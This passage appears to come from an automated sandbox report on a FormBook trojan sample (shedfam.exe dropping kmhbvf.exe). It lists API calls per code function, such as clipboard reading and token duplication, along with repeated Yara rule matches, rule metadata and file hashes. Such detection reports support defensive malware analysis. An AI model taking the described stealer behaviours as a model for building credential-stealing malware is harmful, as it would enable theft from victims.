0_2_00405125

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

1_2_00F44632

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		1_2_00F5D164
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_00F5D164

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00406333	0_2_00406333
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00404936	0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF33B7	1_2_00EF33B7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00ED9C80	1_2_00ED9C80
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF23F5	1_2_00EF23F5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F58400	1_2_00F58400
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F06502	1_2_00F06502
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EDE6F0	1_2_00EDE6F0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F0265E	1_2_00F0265E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF282A	1_2_00EF282A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F089BF	1_2_00F089BF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F06A74	1_2_00F06A74
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F50A3A	1_2_00F50A3A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EE0BE0	1_2_00EE0BE0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F2EDB2	1_2_00F2EDB2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFCD51	1_2_00EFCD51
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F50EB7	1_2_00F50EB7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F38E44	1_2_00F38E44
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F06FE6	1_2_00F06FE6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EDB020	1_2_00EDB020
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00ED94E0	1_2_00ED94E0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EED45D	1_2_00EED45D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFF409	1_2_00EFF409
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EDF6A0	1_2_00EDF6A0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF16B4	1_2_00EF16B4
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00ED1663	1_2_00ED1663
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EEF628	1_2_00EEF628
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF78C3	1_2_00EF78C3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF1BA8	1_2_00EF1BA8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFDBA5	1_2_00EFDBA5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F09CE5	1_2_00F09CE5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EEDD28	1_2_00EEDD28
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF1FC0	1_2_00EF1FC0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EFBFD6	1_2_00EFBFD6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF0227	1_2_03AF0227
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_03AF04D8	1_2_03AF04D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041E81B	2_2_0041E81B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041DA1E	2_2_0041DA1E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D5A6	2_2_0041D5A6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00409E60	2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041EF6B	2_2_0041EF6B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041DFC2	2_2_0041DFC2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041E798	2_2_0041E798
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EDB020	2_2_00EDB020
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EFDBA5	2_2_00EFDBA5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00ED94E0	2_2_00ED94E0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00ED9C80	2_2_00ED9C80
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EED45D	2_2_00EED45D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00F58400	2_2_00F58400
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EFCD51	2_2_00EFCD51
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EEDD28	2_2_00EEDD28
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00F06502	2_2_00F06502
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EF16B4	2_2_00EF16B4
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00ED1663	2_2_00ED1663
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EEF628	2_2_00EEF628
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00F06FE6	2_2_00F06FE6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EFBFD6	2_2_00EFBFD6

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F28F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

1_2_00F28F2E

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\kmhbvf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D

Source: shedfam.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
